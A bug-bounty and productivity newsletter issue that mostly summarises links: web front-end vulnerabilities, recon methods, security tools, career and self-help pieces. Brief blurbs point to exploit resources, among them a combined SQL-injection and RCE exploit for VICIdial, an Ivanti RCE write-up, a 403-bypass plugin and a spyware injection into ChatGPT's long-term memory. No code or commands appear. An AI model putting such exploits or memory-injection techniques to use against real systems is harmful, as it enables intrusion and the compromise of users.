- Hive Five
- Posts
- ๐ Hive Five 190 - Whatever You Think Your Limits Are, Youโre Wrong
๐ Hive Five 190 - Whatever You Think Your Limits Are, Youโre Wrong
Beyond XSS, Console Cowboys, How to be More Productive on your iPhone, and more...
Hi friends,
Greetings from the hive.
I want to hear from you! I want to know how Hive Five has empowered you to hack a life you love.
So, if you've ever benefitted from the newsletter, let me know ๐
Let's take this week by swarm!
๐ The Bee's Knees
Beyond XSS: Explore the Web Front-end Security Universe. Apart from the well-known XSS, web front-end security encompasses lesser-known vulnerabilities like prototype pollution, CSS injection, and side-channel attacks, all worth learning about. MORE
Using YouTube to Steal your Files is an impressive cross-product chain targeting Google is a great example of keeping track of seemingly useless quirks and behaviors. Perhaps one day theyโll be just the missing piece you need. MORE
Refine your recon methods or learn totally new ones as OrwaGodfather shares his approach. He starts off with GitHub and Bing advances search queries. MORE
Learn how to set up an iPhone to be minimalist and productive. I'm a big believer in customizing your (digital) workspaces to your liking. The phone is a big part of that. MORE
Console Cowboys: Navigating the Modern Terminal Frontier. Check out these CLI tools that'll change the way you approach work, making everything faster, smoother, and more efficient. MORE
Upgrade Yourself โ
You're getting the free version. Members get more โ including exclusive & bonus content, access to an online community of smart and driven people, the complete Hive Archive, deep discounts, and so much more. See what you're missing.
Do you have a product or service to promote? Find out more about advertising in Hive Five.
๐ฐ Updates
๐ฏ My work
โ Changelog
Lazygit v0.44.1 comes with numerous changes, including an improved performance with large numbers of untracked or modified files. MORE
RetireJS 1.6.4, offers improvements and bug fixes, such as "Add dependencies to CycloneDX". MORE
Caido release v0.41.0 introduces a new community plugin store, allowing users to install plugins with a single click, and expands the SDK APIs while fixing important bugs. MORE
๐ผ Work
๐ฐ Career
Adam Gilbert founded MyBodyTutor, a 7-figure fitness business, by providing personalized, consistent support that is often missing from diet and workout plans. MORE
The Four Steps to the Epiphany: Successful Strategies for Products that Win. MORE
The tech industry offers lucrative opportunities, but many professionals are unaware of how to maximize their earnings. Learn how to avoid being underpaid in your tech job. MORE
Redditors discuss productivity hacks for corporate jobs, with tips on optimizing workflow, managing time, and avoiding distractions. MORE
๐ Productivity
The Power of Wasting Time. In today's productivity-obsessed world, even a moment's idleness is seen as a grave sin. We are so driven to stay busy and make constant progress that there is no room left for the simple act of wasting time. MORE
Feeling overwhelmed by the present moment? Find a connection to the longer view and a wiser perspective on what matters. MORE
Amanda's daily two-do list is a game changer for making progress on big projects, allowing people to complete 10 projects in a weekโmore than most accomplish in a month. MORE
The video shares a 3-step process used to transform one's life in their 20s, including setting non-negotiables and maximizing productivity. The aim is to structure one's day in a way that makes it impossible to fail. MORE
๐ Community
๐ Celebrate
Valeriy, once doubtful, feels motivated and driven to keep pushing forward after reaching heights he didn't think possible. Let's go! MORE
Jensec, a security researcher, received their highest bounty yet ($42,500). Woot! MORE
Zseano had a great time in Edinburgh this weekend, he got to hang out with his hacking partner Jonathan and got to see NahamSec again after many years. MORE
Endingwithali and Shenetworks launched podcast! This first episode delves into the current tech job landscape, examining the rise in layoffs across major companies. MORE
โก๏ธ Timeline
A controversial repo containing self-hosted bug bounty programs that are considered "scammy" or unethical by the creator. MORE | ITS COUNTERPART
There seems to be some beef in the WordPress community: "It has to be said and repeated: WP Engine is not WordPress. My own mother was confused and thought WP Engine was an official thing." MORE
DAY[0] is back, testing out a new episode format focusing more on discussion rather than summaries. MORE
OpenAI is seemingly banning several security adjacent GPTs from the GPT Store. MORE
Neovimconf 2024 speaker applications are now open! MORE
๐ Follow
Awesome accounts to follow. Randomly selected from my curated Twitter lists.
@tjholowaychuk | TJ Holowaychuk | Mostly film photography.
@0xacb | Andrรฉ Baptista | Ethical hacker on a cosmic journey. Co-founder @ethiack.
@0xkitty | Christina Camilleri | Trust & Safety lead for @Netflix Games. Prev infosec @RiotGames, @BishopFox. Part cyborg. Enjoys motorcycles, video games, whisky and cats.
@ryHanson | Ryan Hanson | Security Researcher. Breaking things at @Atredis.
@akita_zen | Akita | Bug Bounty hunter | Zen Monk | alchemist | its time to awake.
Share Hive Five โ
Share this newsletter with your friends, colleagues, and BFFs.
1 REFERRAL = 20% OFF EVERYTHING IN THE STORE
๐ Level up
๐ฐ Read
How to leverage nuclei headless mode to detect XSS payloads more easily and accurately, using the waitdialog action. This approach significantly reduces the complexity of matching specific server responses, while maintaining high accuracy. MORE
Third-party security scanners often provide non-actionable findings. Google shares tips that will help you distinguish false positives from the real thing when using external scanners, and in turn improve the quality. MORE
The Feeld dating app exposed users' sensitive data and nude photos due to poor security controls, highlighting the critical importance of robust backend security for mobile applications. MORE
GitHub Actions automates software development workflows, allowing developers to customize and execute them directly in their GitHub repositories. This PoC exploit explores how typosquatting can be leveraged within the GitHub Actions ecosystem. MORE
The "real" Ivanti Endpoint Manager (EPM) Pre-Auth RCE CVE-2024-29847 write-up. MORE
๐ก Tips
Use AI to augment yourself. STรK likes XXEs, but testing XML parsers using docx files can be quite a tedious task. So he asked ChatGPT o1 to help him create a Python script that automates the process. MORE
Setting up a blog on GitHub Pages doesnโt have to be a daunting task. With the right tools, templates, and a bit of guidance, you can have your blog up and running with minimal effort. MORE
Review: IFixitโs FixHub May Be The Last Soldering Iron You Ever Buy. MORE
๐ง Wisdom
Framing: "Read the paper, things have never been worse. Read history, things have never been better." MORE
Learn the basics of Tmux in 100 seconds. Tmux is an open-source terminal multiplexer that can juggle multiple terminal sessions from a single window. MORE
Radical Belonging in an Age of Othering. This essay invites us to consider whether we are sick from loneliness or from not belonging โ to each other and ourselves โ and how gratefulness offers a remedy. MORE
Whatever You Think Your Limits Are, Youโre Wrong. MORE
How to Be Less Self-Critical. If you struggle with being too self-critical, here are 5 ways to start turning things around. MORE
๐ Resources
Cursor Rules offers a framework to customize AI behavior, streamline development, and tailor code generation, suggestions, and queries. MORE
Spyware Injection Into Your ChatGPT's Long-Term Memory (SpAIware). MORE
GitHub's collection of .gitignore file templates populate the template choosers on GitHub.com when creating new repositories and files. MORE
Combined exploit for two critical vulnerabilities discovered in VICIdial by KoreLogic: CVE-2024-8503: Unauthenticated SQL Injection (SQLi) and CVE-2024-8504: Authenticated Remote Code Execution (RCE). MORE
TJNull has released his pentest template for Obsidian, which includes a better structure, tags, and techniques used in engagements, Hack the Box, and PEN-200. MORE
๐ญ Quote
"The only person you are destined to become is the person you decide to be."
๐ Explore
๐งฐ Tools
403Bypasser is a simple Caido plugin that lets you bypass 403 status code by transforming HTTP requests with custom templates. MORE
Subdominator is a new CLI tool designed to rapidly and accurately detect subdomain takeovers. It aims to be a significant improvement over existing tools, focused on precision and speed. MORE
Grimoire is a "REPL for detection engineering" that allows users to generate datasets of cloud audit logs for common attack techniques, currently supporting AWS. MORE
This script checks DNS A and CNAME records for a list of domains against AWS IP ranges, helping identify potentially risky or unowned resources in your or your client's cloud infrastructure. MORE
Subwiz is a reconnaissance tool that employs AI to forecast subdomains and then returns those that resolve. MORE
๐ฅ Watch
Supercharging Developer Productivity with ChatGPT and Claude with Simon Willison. He shares his favorite prompting and debugging techniques, his strategies for sidestepping the limitations of contemporary models, and more. MORE
Why is Vite Everywhere? Evan discusses Vite, a JavaScript build tool that simplifies the process of transforming and bundling code for web applications MORE
8 exercises to address the negative effects of working behind a desk all day. MORE
NahamSec demonstrates two methods for hacking GitLab instances for a $5,000 bounty. MORE
The Web Dev Challenge tasks a team to create an app that excites people about their local food scene, with only 45 minutes to plan and 4 hours to build. The goal is to see what they can accomplish under tight constraints. MORE
๐ต Listen
Robert Greene transitioned from a struggling screenwriter to a bestselling author by mastering the art of storytelling, inspiring entrepreneurs, politicians, and artists alike. How does he do it? MORE
The untold story of Casey Neistat: "I was a homeless dad at 15 & had $200k debt!" MORE
Robert went from being โa drunk, failed screenwriterโ to writing seven bestsellers with millions of copies sold. Entrepreneurs, politicians, and hip-hop artists like 50 Cent all love his work. His secret ingredient? Storytelling. MORE
๐ Technology
Get $200 to try DigitalOcean โ the go-to for all my recon, automation, and VPN needs. Get access to a comprehensive range of cloud resources, all at an affordable price.
Sidekick makes hosting side projects as straightforward, affordable, and production-ready as possible. You'll be surprised how much traffic a $8/month instance on DigitalOcean can handle. MORE
Cloudflare's Internet speed test allows you to measure your network performance without annoying ads. MORE
The new Stripe Dev website is a fascinating piece of front-end dev work, containing some cutting-edge design and dev work. MORE
Uptime Kuma is an easy-to-use, self-hosted monitoring tool that lets you keep track of your website's uptime. MORE
The relentless march of AI advancements is a defining characteristic of the technology industry, yet vi, a text editor, endures. Though much changes, some things stay the same. MORE
"The other reason it feels special is that vi makes turns manipulating text into a key-based form of Street Fighter. Sure, you can have fun just learning the basic buttons for punching and kicking, but the game unlocks an entirely new dimension the moment you pull off your first hadoken [...]"
๐ Interesting
The Lighthouse Map website provides an interactive map showcasing the locations of lighthouses around the world, allowing users to explore these important maritime landmarks. MORE
Windows Solitaire, a beloved office distraction, was not created by a seasoned employee but by a bored Microsoft intern โ a surprising origin for a staple of digital entertainment. MORE
Who made the man in the desert? Digital investigator Ben takes a look at the mysterious Marree Man, a giant geoglyph etched into the remote Australian outback. MORE
Bonzo, a videographer, shares his journey of starting over from zero, a beautiful and meaningful experience. MORE
YouTube Thumbnail Viewer allows one to view the thumbnail of any YouTube video by entering the URL or video ID. MORE
๐ Learned something? Dive deeper.
Upgrade Yourself โ
You're getting the free version. Members get more โ including exclusive & bonus content, access to an online community of smart and driven people, the complete Hive Archive, deep discounts, and so much more. See what you're missing.
Share Hive Five โ
Share this newsletter with your friends, colleagues, and BFFs.
1 REFERRAL = 20% OFF EVERYTHING IN THE STORE
Until next week, take care of yourself and each other,
Bee ๐
This newsletter may contain affiliate links that support its costs. These links lead to tools, courses, and resources that I've personally found helpful.